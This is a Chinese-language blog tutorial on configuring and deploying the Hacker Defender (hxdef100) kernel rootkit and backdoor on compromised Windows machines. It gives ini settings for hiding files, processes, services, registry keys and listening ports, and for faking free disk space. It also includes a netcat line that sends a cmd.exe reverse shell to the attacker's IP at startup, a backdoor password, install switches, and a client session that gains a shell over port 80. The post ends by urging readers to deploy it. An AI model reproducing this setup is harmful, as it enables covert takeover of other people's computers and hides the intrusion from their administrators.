现在的位置: 首页 > 综合 > 正文

Hxdef100配置及使用方法

2013年08月13日 ⁄ 综合 ⁄ 共 3127字 ⁄ 字号 评论关闭
在众多后门中,Rootkit是一个非常不错的选择。在当前比较流行的Rootkit之中, Hacker defender尤其被人关注, 由于它作为内核的一部分运行,所以这种后门将会越来越比传统技术更加强大更加不易被发觉。一旦被安装运行到目标机器上,系统就会完全被控制在hacker手中了——甚至系统管理员根本找不到安全隐患的痕迹。
作为一款非常出色的Rootkit,hxdef100给我们提供了很多可选择配置的功能,比如:用户可以通过本软件隐藏文件、进程、系统服务、系统驱动、注册表键的键和键值、打开的端口以及虚构可用磁盘空间,下面我们就来看一下这款诱人的内核级后门是如何打造出来的。
一,配置
首先,检查我们下载来的hxdef,应该具备如下文件:
bdcli100.exe ;自带后门客户端连接文件
hxdef100.exe ;Hxdef100后门主程序
hxdef100.2.ini ;hxdef配置文件模板
hxdef100.ini ;hxdef经过简单加密过的配置文件模板
rdrbs100.exe ;Redirector工具(类似与端口转发)
打开hxdef100.2.ini,我们可以看到hxdef的默认配置选项,首先,我们先对[Hidden Table]项进行配置,[Hidden Table] 是要隐藏的列表,写在这个项目下的字符串,不管是作为文件名还是目录名,都将不在WINDOWS任务管理器、资源管理器中出现,并且支持通配符,一行一个。例如:
[Hidden Table]
hxdef* ;隐藏所有以hxdef开头的文件名、目录名等等
rcmd.exe ;隐藏rcmd.exe文件
下一步,就是[Root Processes] 项,这里是能在配置要隐藏能在进程管理器中显示的进程名,同样支持统配符。配置如下:

 

[Root Processes]
hxdef* ;隐藏以hxdef开头的所有进程
rcmd.exe ;隐藏rcmd.exe进程

[Hidden Services]项目,是所要进行隐藏的服务列表,hxdef非但能隐藏自身,而且可以为其他后门、程序提供隐藏服务。这是hxdef的一大亮点。首先当然是隐藏自身的服务名,而后是其他服务,一行一个,也支持统配符。配置例如:
[Hidden Services]
HackerDefender* ;这里是你的hxdef的服务名
WinMgrs ;这个是我的WinEggDrop 的服务名

[Hidden RegKeys]隐藏RegKey列表,我们添加的服务,都将会在HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services 找到对应的注册表项,所以,为了做到彻底隐藏,我们就要将隐藏进行到底。配置例子:

[Hidden RegKeys]
HackerDefender100 ;hxdef默认的服务名
LEGACY_HACKERDEFENDER100 ;LEGACY_加hexdef服务名
HackerDefenderDrv100 ;hexdef默认的驱动名
LEGACY_HACKERDEFENDERDRV100 ;LEGACY_加 hexdef驱动名
其他的服务也如此添加,不同服务对应自身的服务名。

[Hidden RegValues] 所要隐藏的注册表键值列表,这里不经常用到,用法也颇为简单,只需要把所要隐藏的注册表键值写入到该项目下即刻。

[Startup Run] 后门在启动时,同时启动的其他项目列表,这里我们可以放进一些不能随开机启动的项目,比如NC,用法:
[Startup Run]
nc -e %windir%/system32/cmd.exe 你的IP 端口
这里允许使用例如:%windir%、%tmpdir%等之类的环境变量。
[Free Space] 通常我们会利用肉鸡做我们的PUB FTP或放入自己的一些东东,久而久之,磁盘占用问题就出来了,这个选项就是用于欺骗管理员某磁盘上多加入的磁盘空间……
看看是如何配置的吧:
[Free Space]
C: 1024717696 ;增加C盘1个G的虚拟空间(假的)
D: 1024717696 ;增加D盘1个G的虚拟空间(假的)

[Hidden Ports] 隐藏端口列表,这个我们平时用到的比较多,写在这个列表一的端口,可以不再显示监听,用netstat –na 也查不到喔。配置方法很简单:

[Hidden Ports]
TCP:4136,8922,9333 ;要隐藏的TCP协议端口
UDP:4136,8922,9333 ;要隐藏的UDP协议端口
[Settings] hxdef的设置部分,可以设置hxdef的服务名、描述、显示名等等。设置方法如下:
[Settings]
Password=Lilo654321 ;后门连接密码
BackdoorShell=stdio?.exe ;后门连接后,会将cmd.exe复制一份,每个连接复制一份,?为统配符。连接完毕后会自动删除。
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100 ;hxdef的服务名,要和上面[Hidden Services]项目中的对应喔。
ServiceDisplayName=HXD Service 100 ;hxdef服务显示名
ServiceDescription=powerful NT rootkit ;hxdef服务描述
DriverName=HackerDefenderDrv100 ;hxdef驱动名
DriverFileName=hxdefdrv.sys ;hxdef驱动文件名。
[Comments]为注释部分,由于hxdef100的配置文件为ini,所以,一定要把[Hidden Table]
项目填写正确,将ini文件也隐藏掉,否则。。就等着哭喽~

以上,我们了解了Hxdef100的配置方法,在种植时,需要注意一下几个开关选项及事项:
-:installonly ;仅仅进行安装服务,并不同步运行。
-:refresh ;重新读取INI设置
-:noservice ;正常运行,但不安装成服务,从新启动时恢复,测试时使用。
-:uninstall ;将hxdef移出内存,并且断开所有连接及卸载服务

二,使用
上面的配置比较死板,大家也看累了吧?呵呵,下面我来看看它的简单使用方法!
客户端连接程序bdcli100.exe用法也尤为简单,逐个输入所要求输入的选项即刻进入Shell,hxdef100自带的后门,并不是传统后门,象 bits和WinEggDrop老哥的PortLess类似,后门程序并不开端口,而是Sniffer所有网卡是否有发送连接字符串,然后进行连接的。用法例如:
C:/>bdcli100
Host: 192.168.0.102 ;连接远程服务器
Port: 80 ;进行连接的端口
Pass: Lilo654321 ;hxdef100的连接密码
connecting server ...
receiving banner ...
opening backdoor ..
backdoor found
checking backdoor ......
backdoor ready
authorization sent, waiting for reply
authorization - SUCCESSFUL
backdoor activated!
close shell and all progz to end session ;过了这一步,就得到Shell啦。
另外,端口复用技术也在这个后门上得到发挥,前文后门专题已经有介绍了,这里就不再多说,大家可以不光利用80端口控制服务器,53、21 等端口都可以连入系统!
对于这么好的一个后门+Rootkit,你不心动吗?还等什么,赶快去光盘下载配置一个吧!

 

抱歉!评论已关闭.